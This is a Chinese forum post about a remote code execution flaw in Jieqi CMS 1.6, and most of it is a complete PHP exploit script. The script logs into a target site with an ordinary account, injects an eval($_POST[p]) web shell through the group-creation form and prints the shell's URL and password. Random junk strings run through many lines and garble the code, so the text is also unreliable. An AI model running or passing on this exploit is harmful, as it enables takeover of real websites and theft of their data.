杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
1 k$ \. \( O- R/ m2 ~ [5 o/ N8 j* m! X8 b: j4 Q' i" D* _4 C
$ J c) H! g% y; f) o5 X
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。
5 o2 y. c8 F8 o: O5 u; b! y5 s, b" y 需要有一个能创建圈子的用户。
9 {$ L% q, w) p2 B! t: k 8 b# [7 N9 b1 g# f3 o5 G5 \
<?php
, Q& Q, @2 D% N! K) o/ H
; t. m/ B* R n, F" L( K7 r; L0 rprint_r('0 Q7 N: p0 A: c7 [- Z" O
+---------------------------------------------------------------------------+
6 @$ `0 \1 M9 Q# }Jieqi CMS V1.6 PHP Code Injection Exploit
% \! U9 Y0 m, }2 [/ t6 n7 eby flyh4t
* h8 M7 r' U8 @2 Ymail: phpsec at hotmail dot com8 F$ K/ E* ]/ M$ ?" B3 C2 A
team: http://www.wolvez.org; W M7 i+ ^1 b) I( I0 `/ A/ X: a* H
+---------------------------------------------------------------------------+
- M" J& y! J1 _/ A5 b6 ]'); /**5 k7 c* E2 \. _6 M% S) S% w: f6 L
* works regardless of php.ini settings7 H, }% i, x4 U9 |4 C) t
*/ if ($argc < 5) { print_r('
5 P+ o- ] S4 ~# H, G) k+---------------------------------------------------------------------------+7 c6 J: d: a2 X
Usage: php '.$argv[0].' host path username) P6 c# p/ ?- k, {4 }& s
host: target server (ip/hostname)
! s0 _( m0 ~2 A, x; p* Ypath: path to jieqicms + @# [5 n2 [# k2 e% F
uasename: a username who can create group
7 h5 q9 N- e* t. |. qExample:; e8 R. \& X1 P+ b
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password0 s$ @$ f: D7 b# N4 z
+---------------------------------------------------------------------------+7 c6 G9 V. a8 f! w
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961
" R' L$ k1 \ r! _8 m; \Content-Disposition: form-data; name="gname"
3 C$ q& U" I- z2 v6 @ , }0 N# M1 H9 f
'; $params .="';"; $params .='eval($_POST[p]);//flyh4t
1 T; \2 i" C* z+ y L-----------------------------23281168279961* p; j" V/ {2 g. P# c4 f0 U
Content-Disposition: form-data; name="gcatid" x7 B7 ^: C/ @9 G
, q; @, g b1 c9 d, |) Q1
9 S% b/ W) e! V7 ~-----------------------------23281168279961
; {4 E& p# H H* {; `3 hContent-Disposition: form-data; name="gaudit"
0 t! y$ ?. }: Z+ ^( i1 R: P7 E # t$ k' R9 j0 y5 w$ H
1
0 _2 }3 T. S3 J X-----------------------------23281168279961( T, ]4 J+ B3 r* C
Content-Disposition: form-data; name="gbrief"
2 n* m) }' r+ C9 l" f. A* s
& m8 k) C. P4 L# n9 k9 u1
. q! C7 _9 a* R. f1 M. y M-----------------------------23281168279961--. h- j1 `# u! {# X9 a
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com
& f( v3 m8 {0 q# ?% n, h % e& k: Z, W8 I9 S( |' U9 @- o
preg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对